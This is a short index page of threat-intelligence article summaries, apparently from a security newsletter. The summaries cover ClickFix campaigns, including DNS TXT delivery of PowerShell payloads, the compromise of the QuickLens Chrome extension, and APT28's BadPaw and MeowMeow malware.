Analysis of Velvet Tempest's sophisticated attack chain using ClickFix social engineering and CastleRAT backdoor deployment
Weekly insights on threats, vulnerabilities, and security best practices.
Analysis of the QuickLens Chrome extension compromise reveals sophisticated supply chain attack TTPs targeting crypto wallet credentials through ClickFix social engineering.
Attackers now leverage DNS TXT records and nslookup commands to deliver PowerShell payloads in ClickFix campaigns, bypassing traditional detection mechanisms through legitimate DNS infrastructure.
APT28 deploys previously unknown BadPaw loader and MeowMeow backdoor against Ukrainian targets via phishing campaigns, revealing advanced persistence tactics for critical infrastructure attacks.
